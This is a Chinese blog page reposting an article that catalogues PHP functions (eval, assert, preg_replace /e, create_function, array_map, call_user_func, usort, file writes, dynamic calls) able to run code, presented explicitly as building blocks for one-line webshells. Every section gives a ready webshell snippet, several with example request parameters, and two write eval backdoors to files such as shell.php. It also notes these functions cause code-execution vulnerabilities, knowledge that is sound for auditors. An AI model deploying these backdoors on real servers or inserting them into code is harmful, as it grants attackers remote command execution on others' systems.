会员

贴心博客(Imblog)

基于`Imcat(贴心猫)+(微样式)Weys`开发

PHP代码执行函数总结(可以用于制作一句话木马)

2019-06-20 18:02 工作

https://blog.csdn.net/nzjdsds/article/details/81908610
PHP代码执行函数总结(可以用于制作一句话木马)


PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。

常见代码执行函数,如  

eval()、assert()、preg_replace()、create_function()
array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()
文件操作函数、动态函数($a($b))


1、eval() 

  eval() 函数把字符串按照 PHP 代码来计算,如常见的一句话后门程序:[?php eval($_POST[cmd])?]


2、assert()

   与eval类似,字符串被 assert() 当做 PHP 代码来执行,如:

示例代码:

[?php 
//?cmd=phpinfo()
assert($_REQUEST[cmd]); 
?]


3、preg_replace()       (php5.5以后的版本废除了/e)

  mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

  搜索subject中匹配pattern的部分, 以replacement进行替换。

  preg_replace()函数原本是执行一个正则表达式的搜索和替换,但因为存在危险的/e修饰符,使 preg_replace() 将 replacement 参数当作 PHP 代码

[?php 
//?cmd=phpinfo()
@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");
?]


4、create_function()

  create_function主要用来创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。

代码示例:

[?php 
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?]
参考链接:

代码安全:PHP create_function()注入命令执行漏洞

http://www.cnseay.com/1901/
http://lovexm.blog.51cto.com/3567383/1743442
http://qqhack8.blog.163.com/blog/static/11414798520153795157139/


5、array_map()

  array_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。

 代码示例:

[?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?]


6、call_user_func()/call_user_func_array ()

call_user_func — 把第一个参数作为回调函数调用,其余参数是回调函数的参数。
call_user_func_array — 调用回调函数,并把一个数组参数作为回调函数的参数

[?php 
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?]
 
[?php 
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?]


7、array_filter()

rray array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

  依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

[?php 
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?]
 

8、usort()、uasort()

  usort() 通过用户自定义的比较函数对数组进行排序。
  uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。

php环境>=5.6才能用
[?php usort(...$_GET);?]
利用方式:
test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert
[POST]:x=phpinfo();
 
php环境>=<5.6才能用
[?php usort($_GET,'asse'.'rt');?]
利用方式:
test.php?1=1+1&2=eval($_POST[x])
[POST]:x=phpinfo();


9、文件操作函数

  file_put_contents() 函数把一个字符串写入文件中。
  fputs() 函数写入文件

代码示例:

[?php 
$test='[?php eval($_POST[cmd]);?]';
file_put_contents('test1.php',$test);
?]
[?php 
fputs(fopen('shell.php','w'),'[?php eval($_POST[cmd])?]'); 
?]


10、动态函数

  PHP函数直接由字符串拼接

[?php 
//?a=assert&b=phpinfo()
$_GET['a']($_GET['b']);
?]


 

来源:(原创) 编辑:peace 关键词:PHP,一句话木马

    More 心情墙

  • 71 不想授权的伙伴,你也多了一条免费之路 ---`贴心博客(Imblog)`!
  • 14 尊重版权,没有任何借口:支持织梦授权。
  • 8 某镇教育网[2007] vs [2021]某校教育平台; 一个成功的作品,和一个成功的项目管理过程,是完全两回事。
  • 10 计划不如变化;说好的[下午]开会,却有意安排到[晚上]。
  • 有所为,有所不为,是为华为! 凝心聚力,中华有为!

    22 2019-06-02

  • 2019愿望: 1.多健身少生病;2.学习英语,心理学;3.发布`贴心博客`,`贴心企业网`,`贴心房产网`(部分合作开发)...

    27 2018-12-31

  • 愿与[企业,客户]三方利益达到最佳平衡!

    4 2018-12-16

    More 和平鸽小语

  • 4 业余系统,开源分享;从未忘记,初心梦想。
  • 3 中国年=人民币: Happy CNY, I get a CNY 8.8 red envelope. 慢慢去体会,用一生去体会!
  • 2 2019:经济危机后;Android,鸿蒙,iOS将三足鼎立 想起:非暴力不合作;该赶美企,抵美货了...
  • 6 修桥、修路、修房子,已经习惯了,只要砸钱就行了; 这个芯片砸钱不行的,得砸数学家、物理学家、化学家... (任正非)
导航
博客文章
便笺墙
家族亲友树
联系我们
地址:银河县太阳镇地球村
电话:135-37****47
邮箱:80893510@qq.com

Copyright@贴心博客(Imblog)

Run:1.106/18.025(ms); 6(sql)/2.114(MB); comm:info/detail; Upd:2021-10-26 10:12:39